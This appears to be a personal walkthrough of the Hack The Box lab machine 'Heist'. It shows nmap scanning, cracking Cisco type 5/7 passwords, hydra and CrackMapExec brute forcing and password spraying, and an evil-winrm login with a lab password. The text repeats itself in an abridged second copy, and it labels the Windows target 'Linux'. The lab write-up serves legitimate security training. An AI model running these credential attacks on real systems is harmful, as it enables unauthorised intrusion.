Heist

Easy - Linux

Recon

$ sudo nmap -sV -sC -T4 -p- -Pn 10.10.10.149 -oN nmap.txt

# Nmap 7.92 scan initiated Sat Dec 17 16:04:29 2022 as: nmap -sV -sC -T4 -p- -Pn -oN nmap.txt 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-12-17T22:08:28
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 17 16:09:12 2022 -- 1 IP address (1 host up) scanned in 282.70 seconds

HTTP and Looting Cisco IOS Config

On an initial visit to the HTTP service, we see a login page. We have no creds yet, so let's keep searching. There's a guest login available, and visiting that, we see a few support messages and a Cisco config attachment. At the time, I have been attending a CCNA (Cisco Certified Network Associate) course at my college, so I was familiar with the layout of the config. Most of the config is irrelevant to us, but the security lines should catch your eye.

cisco_config.txt

enable secret 5 $1$pdQG...Kc91
!
username rout3r password 7 0242...1713
username admin privilege 15 password 7 0237...5408

To understand how to identify the encrypted text, we need to first understand how Cisco IOS stores configurations. Let's take this line for example:

enable secret 5 $1$pdQG...Kc91

enable tells the router to enable a mode for PRIV EXEC mode, in this a secret password to log in. In this context, the secret word indicates that it is encrypted in Cisco Type 5, which is essentially a 1,000 iteration MD5 with a salt.

username rout3r password 7 0242...1713
username admin privilege 15 password 7 0237...5408

The next two lines indicate something similar to above. In this case, these configuration lines are used for SSH authentication. We see a username declaration, a password type, then the ciphered password. Instead of Type 5, we see it's using Type 7 now. Thankfully, instead of using MD5, the ciphertext is utilizing the Vigenère cipher which is essentially a simple alphabetical substitution encryption and can be decrypted easily. Let's record these usernames and decrypt/decipher these passwords.

To crack Type 5: https://www.ifm.net.nz/cookbooks/cisco-ios-enable-secret-password-cracker.html

Or: john --format=md5crypt --fork=4 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt To crack Type 7: https://www.firewall.cx/cisco-technical-knowledgebase/cisco-routers/358-cisco-type7-password-crack.html To learn more about Cisco password, view this page: https://www.router-switch.com/faq/six-types-of-cisco-password.html

Don't forget to record the user in the support thread we gained guest access to for his username!

Brute Forcing

Now that we have some possible credentials to test for, let's get to crackin'. Remember in the support thread, Hazard asked for a access to the Windows server. Let's use hydra to brute force SMBv2.

$ hydra -L usernames -P passwords smb2://10.10.10.149
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 10:22:09
[WARNING] Workgroup was not specified, using "WORKGROUP"
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking smb2://10.10.10.149:445/
[445][smb2] host: 10.10.10.149   login: Hazard   password: ...
...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-20 10:22:58

Now that we have some valid creds, let's record it and enumerate Windows services.

Enumeration

Logging in to SMB with these creds didn't give much, plus there weren't any shares to note. WinRM also didn't allow us in.

Let's get our hands on CrackMapExec to brute force RID's. I honestly had to take a peek at the walkthrough to get pointed in the right direction.

$ cme --verbose smb 10.10.10.149 -u Hazard -p stealth1agent --rid-brute
SMB         10.10.10.149    445    SUPPORTDESK      [+] Brute forcing RIDs
SMB         10.10.10.149    445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
....
SMB         10.10.10.149    445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

Time for brute forcing to see if our small list of creds might work here.

$ cme smb 10.10.10.149 -u users.txt -p passwords.txt
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:... STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:... STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4...?d

Seems like Chase has the password we have as well. How about WinRM/SMB'ing him?

$ evil-winrm -u Chase -p "Q4)sJu\Y8qz*A3?d" -i 10.10.10.149
...

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Desktop>

Now that we're in Chase, let's grab the flag in Desktop and view a todo.txt.

todo.txt

Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

yada yada dump firefox memory, grep for post request string, get password, pwned. I just went through the walkthrough for the end, I don't have any reason to just copy paste another walkthrough on mine.

https://0xdf.gitlab.io/2019/11/30/htb-heist.html

PreviousCurling NextPhotobomb

Last updated 2 years ago

Heist

Easy - Linux

Recon

$ sudo nmap -sV -sC -T4 -p- -Pn 10.10.10.149 -oN nmap.txt

# Nmap 7.92 scan initiated Sat Dec 17 16:04:29 2022 as: nmap -sV -sC -T4 -p- -Pn -oN nmap.txt 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.11s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-12-17T22:08:28
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 17 16:09:12 2022 -- 1 IP address (1 host up) scanned in 282.70 seconds

HTTP and Looting Cisco IOS Config

cisco_config.txt

enable secret 5 $1$pdQG...Kc91
!
username rout3r password 7 0242...1713
username admin privilege 15 password 7 0237...5408

To understand how to identify the encrypted text, we need to first understand how Cisco IOS stores configurations. Let's take this line for example:

enable secret 5 $1$pdQG...Kc91

username rout3r password 7 0242...1713
username admin privilege 15 password 7 0237...5408

To crack Type 5: https://www.ifm.net.nz/cookbooks/cisco-ios-enable-secret-password-cracker.html

Don't forget to record the user in the support thread we gained guest access to for his username!

Brute Forcing

Now that we have some possible credentials to test for, let's get to crackin'. Remember in the support thread, Hazard asked for a access to the Windows server. Let's use hydra to brute force SMBv2.

$ hydra -L usernames -P passwords smb2://10.10.10.149
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 10:22:09
[WARNING] Workgroup was not specified, using "WORKGROUP"
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:4/p:3), ~1 try per task
[DATA] attacking smb2://10.10.10.149:445/
[445][smb2] host: 10.10.10.149   login: Hazard   password: ...
...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-20 10:22:58

Now that we have some valid creds, let's record it and enumerate Windows services.

Enumeration

Logging in to SMB with these creds didn't give much, plus there weren't any shares to note. WinRM also didn't allow us in.

Let's get our hands on CrackMapExec to brute force RID's. I honestly had to take a peek at the walkthrough to get pointed in the right direction.

$ cme --verbose smb 10.10.10.149 -u Hazard -p stealth1agent --rid-brute
SMB         10.10.10.149    445    SUPPORTDESK      [+] Brute forcing RIDs
SMB         10.10.10.149    445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
....
SMB         10.10.10.149    445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

Time for brute forcing to see if our small list of creds might work here.

$ cme smb 10.10.10.149 -u users.txt -p passwords.txt
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:... STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:... STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4...?d

Seems like Chase has the password we have as well. How about WinRM/SMB'ing him?

$ evil-winrm -u Chase -p "Q4)sJu\Y8qz*A3?d" -i 10.10.10.149
...

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Desktop>

Now that we're in Chase, let's grab the flag in Desktop and view a todo.txt.

todo.txt

Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.

https://0xdf.gitlab.io/2019/11/30/htb-heist.html

PreviousCurling NextPhotobomb

Last updated 2 years ago